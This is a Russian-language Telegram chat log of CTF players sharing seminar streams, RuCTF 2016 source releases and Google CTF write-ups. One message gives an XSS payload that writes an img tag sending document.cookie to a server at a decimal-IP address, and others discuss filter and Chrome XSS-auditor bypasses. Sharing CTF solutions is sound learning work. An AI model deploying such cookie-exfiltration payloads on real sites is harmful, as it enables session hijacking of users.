Cassini
24.04.2016
00:32:17
I'm readonly.
Sasha
25.04.2016
14:26:44
Привет всем!
А у нас сейчас командный семинар и мы транслируем его в перископ.
Тема семинара от новичков и анонс в группе vk.com/sibears_tomsk
А сама трансляция вот, хоть уже и конец, но может кто запись посмотрит https://www.periscope.tv/w/aezKODFXZ0VndlBEbkRqdlB8MXZBeFJtTEFybk5KbGPqeMAsvzLI-AJrn1CJn4ACmbZP3T0QBMHHnHu6vMWe
Ilja
25.04.2016
14:27:18
спасибо смотрю_
кайф
Google
Ilja
25.04.2016
14:27:30
Завершена 1 минуту назад
а все
Sasha
25.04.2016
14:27:33
Ставь лайки, подписывайся ?
Ilja
25.04.2016
14:27:55
)
RNR ?
25.04.2016
14:29:38
экран плоховато видно
Ilja
25.04.2016
14:29:54
слушайте - вопрос насущный как вы авы для тимы делали?
а то мы до сих пор без авы
Sasha
25.04.2016
14:32:35
Продолжаем трансляцию)
Но скажу еше раз, что для очень новчиков семинар)
Ilja
25.04.2016
14:33:56
Завершена 8 минут назад
Oleg
25.04.2016
15:53:33
У нас сел айфон, потому продолжения не вышло :)
Ilja
25.04.2016
16:13:14
)
Konstantin
25.04.2016
16:30:37
ой, чото видео всего 18 минут вышло
Sasha
25.04.2016
16:35:44
Да, нам нужен человек в команду с заряженным айфоном.
Google
Konstantin
25.04.2016
16:38:44
или с вебкой за пару тыщ рублей ;)
Ilja
25.04.2016
17:25:58
есть в мск)
Alexey
27.04.2016
14:57:36
разбор тасков с олимпиады: https://new.vk.com/wall-2638406_677
видеоразбор RuCTF: https://new.vk.com/wall-2638406_673
Konstantin
27.04.2016
16:50:26
Ура, мы заопенсорсили репозиторий RuCTF 2016: https://github.com/HackerDom/ructf-2016
RNR ?
27.04.2016
17:53:30
круто
еще бы дампов трафика
Vlad
27.04.2016
17:54:50
Наши дампы остались лежать на ноуте(
Konstantin
27.04.2016
18:55:43
дампов, к сожалению, нет
Kitsu
28.04.2016
11:38:37
Alexander
28.04.2016
11:44:23
https://github.com/HackerDom/ructf-2016/commit/250662daf6d3ef1b709f610a7281d7372b7c1a50 закоммитил исходники сервиса discoball на языке swift
RNR ?
29.04.2016
14:38:33
Alexey
01.05.2016
17:31:49
кто уже врайтапы написал на гугл?
Ilja
02.05.2016
04:30:23
пишем
противные xsskи были
ну как противные - я не в то русло вначале со второй копал
пытался обойти XSS protect от chrome
у них же бот был на хроме
а третья xss гуглится
фильтрация точки*
http://countersite.org/83-web-writeup-googlectf-wallowing-wallabies.html
Google
Ilja
02.05.2016
11:45:41
весь день делал райтап
тк случайно удалил)
Bogdan
02.05.2016
11:48:11
схоронил сайт https://requestb.in/ спс)
по второму xss: у тебя там img.src='...', достаточно было написать img.src = (с пробелом)
Ilja
02.05.2016
11:55:24
точно спасибо)
был тогда в экстазе после 3 часов
Bogdan
02.05.2016
11:59:22
в третьем у меня было что-то типа```
document["write"]("<img src=\"http:////123123123//?cookie=\"+document['cookie']\"")`
где 123123123 — десятичное представление ip адреса сервера (да, оно так работает!), а //// потому что // заменяется на /
Ilja
02.05.2016
11:59:58
круто)
ну я там пометку сделал
что способов много
мне тот который в статье понравился)
хотя на ктф я пользовался другим способом
http://seclists.org/fulldisclosure/2008/Jun/230
вот этим на ктф)
а вы какая команда?
Bogdan
02.05.2016
12:03:19
мы далеко от топа :В
Ilja
02.05.2016
12:04:07
мы тоже)
Bogdan
02.05.2016
12:04:55
кто-то mobile 1 решил?
Ilja
02.05.2016
12:05:10
у нас в команде AseN все мобайлы решил
скоро райтап будет
Google
Ilja
02.05.2016
12:05:31
ну как скоро - там писать много
если что - тут инфа о райтапе появится vk.com/invulnerble
тк не всегда в телеграм захожу
кстати если кто хочет помочь в заполнении itsecwiki.org - вики по решению ктф тасков, то будем рады предоставить аккаунт на команду!
Богдан я тут подумал
десятичное представление ip адреса сервера не всегда работает
тк очень часто требуется заголовок HOst
host*
а у тебя он отстутствует
Alexey
02.05.2016
16:20:59
https://habrahabr.ru/post/282846/
Bogdan
02.05.2016
16:29:15
да ладно блин. сделал все то же самое, но у меня вместо plaintext строчек из тех 2 функций возвращался мусор :(
(1 таск)
Ilja
02.05.2016
17:22:37
слушай алексей
а как ты так быстро нашел его?)
Asen только успел его запостить - а ты как на подхвате)
Alexey
02.05.2016
17:30:39
я просто подписан на https://telegram.me/HakerNews
:D
Богдан, у нас тоже мусор был)
IIjsWa}iyYSmksJIYlEL[xj`zux`nk^vzfOARkiPkYmbFftKqusfn}flhQfsqxr\TeaSgnmdc!
TRytfrgooq|F{i-JovFBungFk\Vlpkd\bwvj~HuDgaeTzuSt.@Lex^~wnwGrab{OutbhrCtfqm}
длина та же, 77 символов
Google
Bogdan
02.05.2016
17:32:29
Grab{Out
))
Alexey
02.05.2016
17:33:59
ага, совсем троллинг
Виталий
05.05.2016
10:20:35
я от Сбербанка мне дали задание выяснить настроения в массах. Сбер участвовал как спонсор. насколько хорошо было все органзиовано, проводился ли рекрутмент или сторонние мероприятия и мнение о тех же подарках и выступлении спикера. Есть шанс помочь нам в следующий раз сделать все еще на более высоком уровне.
Ilja
05.05.2016
10:49:30
Какой хоть ктф)
Aleksey
05.05.2016
10:50:17
RuCTF сейчас интересен видимо.
Vlad
05.05.2016
10:50:37
Всем по рюкзаку
Александр
05.05.2016
11:02:27
Книги по телепатии и нанозондам из библиотеки Сбербанка бесценны.